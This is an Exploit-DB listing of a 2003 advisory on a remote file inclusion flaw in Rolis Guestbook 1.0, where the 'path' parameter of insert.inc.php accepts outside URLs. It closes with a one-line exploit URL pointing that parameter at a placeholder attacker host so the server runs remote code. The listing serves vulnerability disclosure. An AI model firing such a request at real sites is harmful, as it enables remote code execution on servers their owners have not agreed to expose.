Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion

EDB-ID:

23384

CVE:

N/A


Platform:

PHP

Published:

2003-11-17

source: http://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. 

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/